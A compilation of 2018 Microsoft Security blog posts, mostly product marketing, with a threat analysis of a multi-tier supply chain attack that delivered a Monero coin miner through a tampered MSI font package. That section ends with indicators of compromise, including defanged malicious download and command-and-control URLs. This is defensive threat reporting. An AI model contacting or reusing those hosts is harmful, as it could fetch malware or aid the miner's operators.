Security researchers play an essential role in Microsofts security strategy and are key to community-based defense. To show our appreciation for their hard work and partnership, each year at Black Hat USA, the Microsoft Security Response Center (MSRC) highlights the contributions of these researchers through the list of Top 100 security researchers reporting to Microsoft (either directly or through a third party) during the previous 12 months. While one criterion for the ranking is volume of fixed reports a researcher has made, the severity and impact of the reports is very important to the ranking also. Given the number of individuals reporting to Microsoft, anyone ranked among the Top 100 is among some of the top talent in the industry.

In addition to unveiling the Top 100 and showcasing Microsoft security solutions at Booth #652, there are a number of featured Microsoft speakers and sessions:

Join us at these sessions during the week of August 4-9, 2018 in Las Vegas and continue the discussion with us in Booth #652, where we will have product demonstrations, theatre presentations, and an opportunity to learn more about our Top 100 and meet with some of Microsofts security experts and partners.

Categories: cybersecurity Tags:

Protect your data in files, apps, and devices

August 2nd, 2018 No comments

Image of four hands collaborating over a drawing of a lightbulb.

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Enable your users to work securely from anywhere, anytime, across all of their devices.

Most companies focus their security solutions around users, devices, and apps, but often overlook the data that they are trying to protect. In this blog, we dig into some of the most challenging data protection scenarios our customers encounter.

How can I make sure company data is safe when employees use their own devices for work?

To help ensure your organizations data is safe on employee-owned devices, Microsoft 365 security solutions give you control and protection throughout the data lifecycle. With interoperating solutions for identity and access management, endpoint protection, information protection, and mobile device management (MDM), Microsoft 365 helps you protect your data against the complicated risks of a mobile landscape.

To build a comprehensive strategy for information protection, start by managing employee identities with Azure Active Directory (Azure AD). Azure AD gives you visibility and control over user identities, allowing you to manage what users can access. It allows your users the ability to securely sign in to business apps and access appropriate company data on their own devices.

Your employees use mobile devices for both personal and work tasks throughout the day, moving quickly among apps and files and potentially mixing up work and personal data. You want to make sure users can be productive while you prevent data loss. You also want to have the ability to protect company data even when accessed from devices that arent managed by you.

You can use Microsoft Intune app protection policies (Figure 1) to help protect your companys data. Because Intune app protection policies can be used independent of any MDM solution, you can use it to protect your companys data with or without enrolling devices in a device management solution. By implementing app-level policies, you can restrict access to company resources and keep data within the purview of your IT department. These policies enable you to provide parameters for how your users interact with or use data in their Intune-managed apps, for example by restricting copy-and-paste and save-as functions.

Figure 1. Intune App Protection policies allow you to restrict access to company resources.

Conditional access in Azure AD (Figure 2) lets you assign conditions that must be met in order for users to gain access. By setting conditional access policies, you can apply the right access controls under the required conditions. Configure conditional access policies to address risks based on user sign-in, network location, unmanaged devices, and client applications.

Figure 2. Conditional access lets you assign conditions that must be met in order for users to gain access.

Protect against accidental data leaks by using Windows Information Protection (WIP) to help secure business data when it leaves your employees’ devices. WIP can be configured through Intune and it allows you to restrict copy-and-paste functions, prevent unauthorized apps from accessing business data, and discriminate between corporate and personal data on the device so it can be wiped if necessary.

How can I make it easier for employees to meet my companys strict compliance requirements for data access and sharing?

Classify and protect documents and emails by applying labels with Azure Information Protection. Labels can be applied automatically by administrators who define rules and conditions manually by users, or by a combination where users are given recommendations. The classification is identifiable regardless of where the data is stored or with whom its shared. For example, you can configure a report document so that it can be accessed only by people in your organization, and control whether that document can be edited, or restricted to read-only, or prevent it from being printed. You can configure emails similarly, and also prevent them from being forwarded or prevent the use of the Reply All option.

How can I protect data when an employee loses their device?

If your employees use their own devices to access or store company information, you can remotely wipe data from managed business apps, like Word and SharePoint, with Intune. Company-owned devices can be managed through Intune MDM, giving you the flexibility to wipe an entire device (factory reset) or just wipe company data.

Deployment tips from our experts

Now that you know more about how Microsoft 365 security solutions can protect your data, here are three proven tips to put it all into action.

Keep your identities safe. Manage employee identities with Azure AD for visibility over user identities and control over what users can access. Configure conditional access policies to apply the right access controls to address access risks.

Manage the devices in your environment with Intune. Enable Intune to be your mobile management strategy to manage the apps that employees use to do business. You can control the apps employees can access, and you can wipe a device when someone leaves the company.

Keep your company data safe. Restrict access to company resources using Intune app protection policies to help protect your companys data. Deploy Azure Information Protection and set up your data classification, labels, and automatic policies to control access by labeling, classifying, and encrypting documents according to their level of security. Then use WIP to protect against accidental data leaks.

Plan for success with FastTrack. This valuable service comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, stay tuned for the white paper Protect your data in files, apps, and devices, within and across organizations coming soon!

More blog posts from this series:

Categories: cybersecurity Tags:

How Microsoft 365 Security integrates with your broader IT ecosystem—part 2

July 31st, 2018 No comments

Todays post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Diana Kelley, Cybersecurity Field CTO.

In part 1 of our blog series, we shared the Microsoft 365 Security strategy for integrating with the broader security community. Today, we cover the services Microsoft 365 Security offers customers to protect assets beyond the Microsoft ecosystem. These are only some examples among a broad and rich set of capabilities helping customers leveraging tools beyond Microsofts services.

Securing the cloud application ecosystem

Microsoft Cloud App Security is Microsofts Cloud Access Security Broker (CASB), which has been fully integrated with Microsoft 365 Security services since Microsofts acquisition of Adallom. Cloud App Security gives visibility into cloud apps and services, provides sophisticated analytics to identify and mitigate cyberthreats, and enables control over how data travels. The service integrates with Azure Active Directory and Azure Information Protection to enrich insights, strengthen security, and automate security operations.

Cloud App Security is designed to:

  • Discover Shadow IT and assess associated risks.
  • Protect data assets when they travel outside of your organization.
  • Provide real-time monitoring and control of user sessions.
  • Detect threats and anomalies.
  • Provide configuration of remediation actions.

Cloud App Security is available for over 16,000 cloud apps and leverages more than 70 parametersincluding regulatory certifications, industry standards, and best practicesto assign a risk score to each app.

Figure 1. Cloud App Security dashboard.

Protecting the worlds endpoints

Windows Defender Advanced Threat Protection (ATP) is Microsofts unified endpoint security platform protecting endpoints from cyberthreats.

Windows Defender ATP is built-in and cloud-powered to:

  • Eliminate risky or unnecessary surface areas.
  • Restrict dangerous code from running.
  • Protect against file-based and file-less malware.
  • Detect and respond to advanced attacks.
  • Automatically investigate alerts and remediate complex threats in minutes.
  • Gain real-time visibility and identify ways to improve your security posture.
  • Empower SecOps to actively hunt for evasive breach activity.

Many customers want to benefit from the advanced security offered by Windows Defender ATP while having the flexibility to use various operating systems. In fact, many organizations today encourage employees to bring their own devicesproviding individuals freedom of choice, but also increasing complexity for IT. Through several partnerships and cross-platform integrations (Figure 2), Windows Defender ATP reduces the complexity of securing these endpoints, providing a single pane of glass for endpoint security visibility across the entire install base.

Figure 2. Windows Defender ATP industry partners.

These partnerships enable Windows Defender ATP to protect, detect, and respond to security threats on macOS, Linux, iOS, and Android devices.

Share encrypted email with anyone on any device

Data protection is fundamental for all organizations. Email encryption is one of the most basic, yet powerful capabilities employed to protect data.

Office 365 Message Encryption comes standard in Office 365 E3 and E5 licenses enabling organizations to:

  • Protect sensitive data.
  • Control data through automatic polices or ad-hoc end user controls in Outlook (desktop and web).
  • Help meet compliance obligations for sensitive data.

For organizations that collaborate on sensitive emails with customers using consumer email services such as Gmail (Figure 3) or Yahoo, users can sign in using their Gmail or Yahoo identities, and open and read messages (including email attachments) encrypted with Office 365 Message Encryption. Once signed in, recipients can use the Office 365 Message Encryption web portal to read and collaborate on encrypted emails.

Figure 3. Office 365 encrypted email opened by a Gmail user.

The experience is completely seamless for Office 365 users, who can view and collaborate on encrypted messages in their Outlook client on any endpoint including desktop, Mac, web, iOS, or Android (Figure 4). For users not using Outlook for mobile, admins can enable other Exchange ActiveSync (EAS) mobile email clients, like the native Mail app on iOS, to receive and respond to encrypted emails.

Figure 4. Office 365 Message Encryption experience in the Outlook mobile.

Digging deeper

These are only a few examples of Microsoft 365 Security services extending protection beyond the Microsoft ecosystem. You will be surprised to see the number of security offerings designed to help protect your organization, no matter which IT solutions you have in place. To get started with envisioning a plan, onboarding, and driving user adoption, go to FastTrack.microsoft.com, sign in with your subscription ID, and complete the Request for Assistance form.

In part 3 of our series, we will highlight real-world examples of Microsoft 365 Security protecting an organizations extended IT environment. Meanwhile, learn more about the depth and breadth ofMicrosoft 365 Securityand start trials of our advanced solutions, which include:

Categories: cybersecurity Tags:

Attack inception: Compromised supply chain within a supply chain poses new risks

A new software supply chain attack unearthed by Windows Defender Advanced Threat Protection (Windows Defender ATP) emerged as an unusual multi-tier case. Unknown attackers compromised the shared infrastructure in place between the vendor of a PDF editor application and one of its software vendor partners, making the apps legitimate installer the unsuspecting carrier of a malicious payload. The attack seemed like just another example of how cybercriminals can sneak in malware using everyday normal processes.

The plot twist: The app vendors systems were unaffected. The compromise was traceable instead to a second software vendor that hosted additional packages used by the app during installation. This turned out be an interesting and unique case of an attack involving “the supply chain of the supply chain”.

The attackers monetized the campaign using cryptocurrency miners going as far as using two variants, for good measure adding to an expanding list of malware attacks that install coin miners.

We estimate based on evidence from Windows Defender ATP that the compromise was active between January and March 2018 but was very limited in nature. Windows Defender ATP detected suspicious activity on a handful of targeted computers; Automated investigation automatically resolved the attack on these machines.

While the impact is limited, the attack highlighted two threat trends: (1) the escalating frequency of attacks that use software supply chains as threat vector, and (2) the increasing use of cryptocurrency miners as primary means for monetizing malware campaigns.

This new supply chain incident did not appear to involve nation-state attackers or sophisticated adversaries but appears to be instigated by petty cybercriminals trying to profit from coin mining using hijacked computing resources. This is evidence that software supply chains are becoming a risky territory and a point-of-entry preferred even by common cybercriminals.

Hunting down the software supply chain compromise

As with most software supply chain compromises, this new attack was carried out silently. It was one of numerous attacks detected and automatically remediated by Windows Defender ATP on a typical day.

While customers were immediately protected, our threat hunting team began an in-depth investigation when similar infection patterns started emerging across different sets of machines: Antivirus capabilities in Windows Defender ATP was detecting and blocking a coin mining process masquerading as pagefile.sys, which was being launched by a service named xbox-service.exe. Windows Defender ATP’s alert timeline showed that xbox-service.exe was installed by an installer package that was automatically downloaded from a suspicious remote server.

Figure 1. Windows Defender ATP alert for the coin miner used in this incident

A machine compromised with coin miner malware is relatively easy to remediate. However, investigating and finding the root cause of the coin miner infection without an advanced endpoint detection and response (EDR) solution like Windows Defender ATP is challenging; tracing the infection requires a rich timeline of events. In this case, Advanced hunting capabilities in Windows Defender ATP can answer three basic questions:

  • What created xbox-service.exe and pagefile.sys files on the host?
  • Why is xbox-service.exe being launched as a service with high privileges?
  • What network and process activities were seen just before xbox-service.exe was launched?

Answering these questions is painless with Windows Defender ATP. Looking at the timeline of multiple machines, our threat hunting team was able to confirm that an offending installer package (MSI) was downloaded and written onto devices through a certain PDF editor app (an alternative app to Adobe Acrobat Reader).

The malicious MSI file was installed silently as part of a set of font packages; it was mixed in with other legitimate MSI files downloaded by the app during installation. All the MSI files were clean and digitally signed by the same legitimate company except for the one malicious file. Clearly, something in the download and installation chain was subverted at the source, an indication of software supply chain attack.

Figure 2. Windows Defender ATP answers who, when, what (xbox-service.exe created right after MSI installation)

As observed in previous supply chain incidents, hiding malicious code inside an installer or updater program gives attackers the immediate benefit of having full elevated privileges (SYSTEM) on a machine. This gives malicious code the permissions to make system changes like copying files to the system folder, adding a service, and running coin mining code.

Confident with the results of our investigation, we reported findings to the vendor distributing the PDF editor app. They were unaware of the issue and immediately started investigating on their end.

Working with the app vendor, we discovered that the vendor itself was not compromised. Instead, the app vendor itself was the victim of a supply chain attack traceable to their dependency on a second software vendor that was responsible for creating and distributing the additional font packages used by the app. The app vendor promptly notified their partner vendor, who was able to identify and remediate the issue and quickly interrupted the attack.

Multi-tier software supply chain attack

The goal of the attackers was to install a cryptocurrency miner on victim machines. They used the PDF editor app to download and deliver the malicious payload. To compromise the software distribution chain, however, they targeted one of the app vendors software partners, which provided and hosted additional font packages downloaded during the apps installation.

Figure 3. Diagram of the software distribution infrastructure of the two vendors involved in this software supply chain attack

This software supply chain attack shows how cybercriminals are increasingly using methods typically associated with sophisticated cyberattacks. The attack required a certain level of reconnaissance: the attackers had to understand how the normal installation worked. They eventually found an unspecified weakness in the interactions between the app vendor and partner vendor that created an opportunity.

The attackers figured out a way to hijack the installation chain of the MSI font packages by exploiting the weakness they found in the infrastructure. Thus, even if the app vendor was not compromised and was completely unaware of the situation, the app became the unexpected carrier of the malicious payload because the attackers were able to redirect downloads.

At a high level, heres an explanation of the multi-tier attack:

  1. Attackers recreated the software partners infrastructure on a replica server that the attackers owned and controlled. They copied and hosted all MSI files, including font package, all clean and digitally signed, in the replica sever.
  2. The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code. With this package tampered with, it is no longer trusted and signed.
  3. Using an unspecified weakness (which does not appear to be MITM or DNS hijack), the attackers were able to influence the download parameters used by the app. The parameters included a new download link that pointed to the attacker server.
  4. As a result, for a limited period, the link used by the app to download MSI font packages pointed to a domain name registered with a Ukrainian registrar in 2015 and pointing to a server hosted on a popular cloud platform provider. The app installer from the app vendor, still legitimate and not compromised, followed the hijacked links to the attackers replica server instead of the software partners server.

While the attack was active, when the app reached out to the software partners server during installation, it was redirected to download the malicious MSI font package from the attackers replica server. Thus, users who downloaded and installed the app also eventually installed the coin miner malware. After, when the device restarts, the malicious MSI file is replaced with the original legitimate one, so victims may not immediately realize the compromise happened. Additionally, the update process was not compromised, so the app could properly update itself.

Windows Defender ATP customers were immediately alerted of the suspicious installation activity carried out by the malicious MSI installer and by the coin miner binary, and the threat was automatically remediated.

Figure 4. Windows Defender ATP alert process tree for download and installation of MSI font packages: all legitimate, except for one

Since the compromise involved a second-tier software partner vendor, the attack could potentially expand to customers of other app vendors that share the same software partner. Based on PDF application names hardcoded by the attackers in the poisoned MSI file, we have identified at least six additional app vendors that may be at risk of being redirected to download installation packages from the attackers server. While we were not able to find evidence that these other vendors distributed the malicious MSI, the attackers were clearly operating with a broader distribution plot in mind.

Another coin miner malware campaign

The poisoned MSI file contained malicious code in a single DLL file that added a service designed to run a coin mining process. The said malware, detected as Trojan:Win64/CoinMiner, hid behind the name xbox-service.exe. When run, this malware consumed affected machines computing resources to mine Monero coins.

Figure 5. Malicious DLL payload extracted from the MSI installer

Another interesting aspect of the DLL payload is that during the malware installation stage, it tries to modify the Windows hosts file so that the infected machine cant communicate with the update servers of certain PDF apps and security software. This is an attempt to prevent remote cleaning and remediation of affected machines.

Figure 6. Preventing further download of updates from certain PDF app vendors

Inside the DLL, we also found some traces of an alternative form of coin mining: browser scripts. Its unclear if this code was the attackers potential secondary plan or simply a work in progress to add one more way to maximize coin mining opportunities. The DLL contained strings and code that may be used to launch a browser to connect to the popular Coinhive library to mine Monero coins.

Figure 7. Browser-based coin mining script

Software supply chain attacks: A growing industry problem

In early 2017, we discovered operation WilySupply, an attack that compromised a text editors software updater to install a backdoor on targeted organizations in the financial and IT sectors. Several weeks later, another supply chain attack made headlines by initiating a global ransomware outbreak. We confirmed speculations that the update process for a tax accounting software popular in Ukraine was the initial infection vector for the Petya ransomware. Later that same year, a backdoored version of CCleaner, a popular freeware tool, was delivered from a compromised infrastructure. Then, in early 2018, we uncovered and stopped a Dofoil outbreak that poisoned a popular signed peer-to-peer application to distribute a coin miner.

These are just some of many similar cases of supply chain attacks observed in 2017 and 2018. We predict, as many other security researchers do, that this worrisome upward trend will continue.

Figure 8. Software supply chain attacks trends (source: RSA Conference 2018 presentation “The Unexpected Attack Vector: Software Updaters“)

The growing prevalence of supply chain attacks may be partly attributed to hardened modern platforms like Windows 10 and the disappearance of traditional infection vectors like browser exploits. Attackers are constantly looking for the weakest link; with zero-day exploits becoming too expensive to buy or create (exploit kits are at their historically lowest point), attackers search for cheaper alternative entry points like software supply chains compromise. Benefiting from unsafe code practices, unsecure protocols, or unprotected server infrastructure of software vendors to facilitate these attacks.

The benefit for attackers is clear: Supply chains can offer a big base of potential victims and can result in big returns. Its been observed targeting a wide range of software and impacting organizations in different sectors. Its an industry-wide problem that requires attention from multiple stakeholders – software developers and vendors who write the code, system admins who manage software installations, and the information security community who find these attacks and create solutions to protect against them, among others.

For further reading, including a list of notable supply chain attacks, check out our RSA Conference 2018 presentation on the topic of software supply chain attack trends: The Unexpected Attack Vector: Software Updaters.

Recommendations for software vendors and developers

Software vendors and developers need to ensure they produce secure as well as useful software and services. To do that, we recommend:

  • Maintain a highly secure build and update infrastructure.

    • Immediately apply security patches for OS and software.
    • Implement mandatory integrity controls to ensure only trusted tools run.
    • Require multi-factor authentication for admins.

  • Build secure software updaters as part of the software development lifecycle.

    • Require SSL for update channels and implement certificate pinning.
    • Sign everything, including configuration files, scripts, XML files, and packages.
    • Check for digital signatures, and dont let the software updater accept generic input and commands.

  • Develop an incident response process for supply chain attacks.

    • Disclose supply chain incidents and notify customers with accurate and timely information.

Defending corporate networks against supply chain attacks

Software supply chain attacks raise new challenges in security given that they take advantage of common everyday tasks like software installation and update. Given the increasing prevalence of these types of attacks, organizations should investigate the following security solutions:

  • Adopt a walled garden ecosystem for devices, especially for critical systems.Windows 10 in S mode is designed to allow only apps installed from the Microsoft Store, ensuring Microsoft-verified security
  • Deploy strong code integrity policies.Application control can be used to restrict the applications that users are allowed to run. It also restricts the code that runs in the system core (kernel) and can block unsigned scripts and other forms of untrusted code for customers who cant fully adopt Windows 10 in S mode.
  • Use endpoint detection and response (EDR) solutions.Endpoint detection and response capabilities in Windows Defender ATP can automatically detect and remediate suspicious activities and other post-breach actions, so even when entry vector is stealthy like for software supply chain, Windows Defender ATP can help to detect and contain such incidents sooner.

In supply chain attacks, the actual compromise happens outside the network, but organizations can detect and block malware that arrive through this method. The built-in security technologies in Windows Defender Advanced Threat Protection (Windows Defender ATP) work together to create a unified endpoint security platform. For example, as demonstrated in this investigation, antivirus capabilities detected the coin mining payload. The detection was surfaced on Windows Defender ATP, where automated investigation resolved the attack, protecting customers. The rich alert timeline and advanced hunting capabilities in Windows Defender ATP showed the extent of the software supply chain attack. Through this unified platform, Windows Defender ATP delivers attack surface reduction, next-generation protection, endpoint detection and response, automated investigation and response, and advanced hunting.

 

 

Elia Florio
with Lior Ben Porat
Windows Defender ATP Research team

 

 

Indicators of compromise (IOCs)

Malicious MSI font packages:
– a69a40e9f57f029c056d817fe5ce2b3a1099235ecbb0bcc33207c9cff5e8ffd0
– ace295558f5b7f48f40e3f21a97186eb6bea39669abcfa72d617aa355fa5941c
– 23c5e9fd621c7999727ce09fd152a2773bc350848aedba9c930f4ae2342e7d09
– 69570c69086e335f4b4b013216aab7729a9bad42a6ce3baecf2a872d18d23038

Malicious DLLs embedded in MSI font packages:
– b306264d6fc9ee22f3027fa287b5186cf34e7fb590d678ee05d1d0cff337ccbf

Coin miner malware:
– fcf64fc09fae0b0e1c01945176fce222be216844ede0e477b4053c9456ff023e (xbox-service.exe)
– 1d596d441e5046c87f2797e47aaa1b6e1ac0eabb63e119f7ffb32695c20c952b (pagefile.sys)

Software supply chain download server:
– hxxp://vps11240[.]hyperhost[.]name/escape/[some_font_package].msi (IP: 91[.]235 [.]129 [.]133)

Command-and-control/coin mining:
– hxxp://data28[.]somee [.]com/data32[.]zip
– hxxp://carma666[.]byethost12 [.]com/32[.]html

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Be like a Moomin: How to establish trust between competitors so we can fight cybercrime

July 24th, 2018 No comments

Image of a Moomin keychain sitting on a hotel desk.Do you know the Moomins? They’re a tight-knit, happy, collaborative cartoon family. I’d never heard of them until I was lucky enough to spend a few days at the Microsoft offices in Helsinki, Finland.

The Moomin keychain in the photo was a gift from the Finnish CISO. As I did a little research into Moomin lore, I discovered a family of wonderful trolls who work with each other, their friends, and acquaintances to overcome adversity. In the first book, The Moomins and the Great Flood, the Moomins become separated. With the landscape flooded, they are unable to find their village, Moominpappa, until they befriend a stork who offers to help them with a winged ride, giving them an aerial vantage point.

The collaborative problem-solving approach of the Moomins fits right into the overall story of trust I frequently heard during my Finland trip. The country has one of the most trusted police and governments in the world. This may partly be due to the fact that trust in the government has been historically high inNordic countries. In 2015, Finland was the second least corrupt country according to theTransparency International organization.

In the online world, Finland has one of thefastest internet speeds in the worldrunningonsome of theleast malware infected pipes. How are they doing this? With tools, such as theCERT-FI Autoreporter system, which help admins find and respond to breaches faster and empowers admins to take actions to protect their networks. This level of engaged partnership in the overall health of the country’s network is valued. The cybersecurity professionals I spoke with are very focused on maintaining this trust and continue toidentifyand buildopportunities for collaboration between the public and private sectors.

Theres some great learning in there for the international cybersecurity community. Its no secret that cyber-adversaries are selectively collaborating to help make themselves more effective. Operating in dark web exchanges and via encrypted messenger, they share exploits, malcode, and successful attack techniques. But if, as the saying goes, theres no honor amongst thieves, how has an international collective of attackers figured out a model for collaboration that in some ways rivals the trust and collaboration between organizations and countries?

Arguably, their collaboration use case is substantively different from large multinational corporations and governments. The value of an exploit generally degrades the longer it is in the wild. This means that part of the cybercriminal financial model is highly dependent on the speed of dissemination. If they hold onto an exploit for too long, they risk having a valueless asset. Finding and monetizing a SQL injection vulnerability is a fairly straightforward and rapid activity. This is in high contrast to large organizations doing business around the globe that must spend a significant amount of time planning and executing their business strategies. Not to mention the fact that, by definition, criminals dont operate under any governmental laws, have any employee protection rules, or pay employee taxes.

On the legal side of cybersecurity, we need to plan for long-term success and adhere to a long list of mandates and regulations. And because were not in the business of selling exploits, sharing with others how one company defends against them could be seen as giving away part of a competitive edge. When it comes to governments, the hurdles to collaborative trust can be much higherespecially when some of those governments are in virtual trade wars with each other.

Despite the hurdles, we can move forward with cyber-collaborationwithout losing our collective competitive edgeby following these three steps:

  1. Agree on the rulesWho shares what and when? And whats the quid pro quo? Asymmetric sharing becomes lopsided and abandoned. Also, how will the information be protected and, as needed, anonymized?
  2. Leverage whats thereISACs are already up and running, with their own rules. There are also industry consortiums like Cloud Security Alliance (CSA) and vendor associations like the Microsoft Intelligent Security Association.
  3. Enforce the rulesIf members of an association dont play fair, it wont be long before members who are following the rules feel cheated. Voluntary trust is good, but there needs to be an enforcement mechanism to ensure fairness. Organizations that dont follow the rules risk getting cut out.

Much like the stork in the story helped the Moomins get an aerial vantage point of the landscape to help find their way to Moominpappa, so too can a collaborative and open sharing approachsubject to the rules, processes, and parameters defined in the steps abovegive you a different perspective of the landscape that your business needs to traverse from a security standpoint.

But keep in mind that, in the story, the stork doesnt do all the worktheres action required on the part of the Moomins too. They need to find the stork in the first place. In our world, this means a systematic effort to reach out to and engage with information-sharing partners and active cultivation of these relationships. Likewise, knowing how to employ that information is also critical. To this end, threat intelligence tools that enhance visibility and detective controls, such as SIM and IDS, help you understand the current state of your environment to better utilize information you receive from information-sharing partners.

Lastly, the Moomins need to know about their village (Moominpappa) to be able to recognize it from a distance. Even if the stork provides them with a better view, they still need to recognize the village from the air, which anybody whos been in an airplane can attest isnt always easy. By analogy, this means that the better security teams understand the normative state of their own networks and infrastructure, the better equipped they are to leverage data they learn through sharing and gathered from visibility-enhancing tools.

Were not living in a cartoon world of Moomins, but that doesnt mean we cant take a valuable lesson from them about trust and collaboration.

Categories: cybersecurity Tags:

March-April 2018 test results: More insights into industry AV tests

In a previous post, in the spirit of our commitment to delivering industry-leading protection, customer choice, and transparency on the quality of our solutions, we shared insights and context into the results of AV-TESTs January-February 2018 test cycle. We released a transparency report to help our customers and the broader security community to stay informed and understand independent test results better.

In the continued spirit of these principles, wed like to share Windows Defender AVs scores in the March-April 2018 test. In this new iteration of the transparency report, we continue to investigate the relationship of independent test results and the real-world protection of antivirus solutions. We hope that you find the report insightful.

Download the complete transparency report on March-April 2018 AV-TEST results

 

Below is a summary of the transparency report:

Protection: Windows Defender AV achieved an overall Protection score of 5.5/6.0, missing 2 out of 5,680 malware samples (0.035% miss rate). With the latest results, Windows Defender AV has achieved 100% on 9 of the 12 most recent tests (combined “Real World” and “Prevalent malware”).
Usability (false positives):Windows Defender AV maintained its previous score of 5.5/6.0. Based on telemetry, most samples that Windows Defender AV incorrectly classified as malware (false positive) had very low prevalence and are not commonly used in business context. This means that it is unlikely for these false positives to affect enterprise customers.
Performance: Windows Defender AV maintained its previous score of 5.5/6.0 and continued to outperform the industry in most areas. These results reflect the investments we made in optimizing Windows Defender AV performance for high-frequency actions.

 

The report aims to help customers evaluate the extent to which test results are reflective of the quality of protection in the real world. At the same time, insights from the report continue to drive further improvements in the intelligent security services that Microsoft provides for customers.

Windows Defender AV and the rest of the built-in security technologies in Windows Defender Advanced Threat Protection (Windows Defender ATP) work together to create a unified endpoint security platform. In real customer environments, this unified security platform provides intelligent protection, detection, investigation, and response capabilities that are not currently reflected in independent tests. We tested the two malware samples that Windows Defender AV missed in the March-April 2018 test and proved that for both missed samples, at least three other components of Windows Defender ATP would detect or block the malware in a true attack scenario. You can find these details and more in the transparency report.

Download the complete transparency report on March-April 2018 AV-TEST results

 

The Windows Defender ATP security platform incorporates attack surface reduction, next-generation protection, endpoint detection and response, and advanced hunting capabilities. To see these capabilities for yourself, sign up for a 90-day trial of Windows Defender ATP, or enable Preview features on existing tenants.

 

 

 

Zaid Arafeh

Senior Program Manager, Windows Defender Research team

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Jumpstart your Microsoft Graph Security API integration with the new JavaScript sample app

July 18th, 2018 No comments

The Microsoft Graph Security API, which launched this spring, is a unified REST API for integrating data and intelligence from Microsoft products, services, and partners. Using Microsoft Graph, developers can easily build applications that consolidate and correlate security alerts from multiple sources, unlock contextual data to inform investigations, and automate security operations for greater efficiency.

We just launched a new sample app that makes it easier than ever for developers to get started. Similar to the Python sample and C# sample, currently available, the new JavaScript sample app provides ready-to-run code to:

  • Display a list of all security alerts for a tenant. Filter by top alerts, category, provider, and severity, or alerts related to a particular user or device.
  • View rich alert details in JSON.
  • Show additional information from Microsoft Graph about a user or device.
  • Update the status of an alert, provide feedback, and add comments.
  • Subscribe to notifications of all new and updated alerts that meet your filters.

Get started with the JavaScript sample app today!

Categories: cybersecurity Tags:

Enable your users to work securely from anywhere, anytime, across all of their devices

July 18th, 2018 No comments

 

Image of four hands collaborating over a drawing of a lightbulb.This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 Security solutions. In this series youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Assessing Microsoft 365 Security solutions using the NIST Cybersecurity Framework.

Your users expect technology to help them be productive, yet you need to keep your organizations data safe. This blog will show you how Microsoft 365 Security solutions can help you achieve this fine balance between productivity and security. We recommend an integrated solution that incorporates managing identities, managing devices, then securing applications, email, and data.

First, well start with the question that we often hear from customers: How can I make sure my employees are working securely when they are working remotely? With digital technology changing how people work, users need to be productive on a variety of devices, regardless if they are company-provided or bring your own device (BYOD). The vital foundation to your in-depth security strategy is strong, integrated identity protection.

Securing identities to protect at the front door

Identity management in Azure Active Directory (Azure AD) is your first step. Once user identities are managed in Azure AD, you can enable Azure AD single sign-on (SSO) to manage authentication across devices, cloud apps, and on-premises apps. Then layer Multi-factor Authentication (MFA) with Azure AD Conditional Access (see Figure 1). These security tools work together to reauthenticate high-risk users and to take automated action to secure your network.

Infographic of a conditions and controls that create a secure network.Figure 1. Set user policies using Azure AD Conditional Access.

Security across devices

From identity, we move to devices. Microsoft Intune lets you manage both company-owned and BYOD from the cloud. Once you set up your Intune subscription, you can add users and groups, assign licenses, deploy and protect apps, and set up device enrollment.

Through Azure AD, you can then create conditional access policies according to user, device, application, and risk.

To strengthen employee sign-in on Windows 10 PCs, Windows Hello for Business replaces passwords with strong MFA consisting of a user credential and biometric or PIN.

Security across apps

Microsoft Cloud App Security gives you visibility and control over the cloud apps that your employees are using. You can see the overall picture of cloud apps across your network, including any unsanctioned apps your employees may be using. Discovering shadow IT apps can help you prevent unmonitored avenues into or out of your network.

Security across email

Once you have secured your organizations devices and applications, its equally important to safeguard your organizations flow of information. Sending and receiving email is one of the weakest spots for IT security. Azure Information Protection allows you to configure policies to classify, label, and protect data based on sensitivity. Then you can track activities on shared data and revoke user access if necessary.

For security against malicious emails, Office 365 Advanced Threat Protection (ATP) lets you set up anti-phishing protections to protect your employees from increasingly sophisticated phishing attacks.

Security across data

Once you have secured how employees access data, its equally important to safeguard the data itself. Microsoft BitLocker Drive Encryption technology prevents others from accessing your disk drives and flash drives without authorization, even if theyre lost or stolen. Windows Information Protection helps protect against accidental data leaks, with protection and policies that travel with the data wherever it goes.

Deployment tips from our experts

Now that you know more about how Microsoft 365 security solutions can protect your people and data in a mobile world, here are three proven tips to put it all into action:

  1. Be proactive, not reactive. Proactively provision identities through Azure AD, enroll devices through Microsoft Intune, and set up Intune App Protection. Enrolling devices can help keep your companys data safe by preventing threats or data breaches before they happen.
  2. Keep your company data safe. Managing employee identities is a fundamental part of information security. Enable SSO and MFA, set up conditional access policies, and then deploy Azure Information Protection for classification and protection of sensitive data.
  3. Plan for success with Microsoft FastTrack. This valuable service comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, stay tuned for the white paper Work securely from anywhere, anytime, across all your devices coming soon!


More blog posts from this series:

Categories: Cloud Computing Tags:

Microsoft Intelligent Security Association expands with new members and products

Last April, we introduced theMicrosoft Intelligent Security Associationa group of 19 security technology providers who have integrated their solutions with a select set of Microsoft products to provide customers better protection, detection, and response.

Today, we are pleased to announce five new members have agreed to join the associationDuo Security, Fortinet, Trusona, Yubico, and Contrast Security. Microsoft is committed to growing the association with partners who can help increase the digital safety to our mutual customers.

In addition to these new members, we are also announcing the addition of Microsoft Cloud App Securityexpanding the products included in the program. Cloud App Security gives you visibility into your cloud apps and services, provides sophisticated analytics to identify and combat cyberthreats, and enables you to control how your data travels.We are thrilled that existing members Zscaler and Forcepoint have integrated with our Cloud App Security product to increase the capabilities in new and exciting ways.

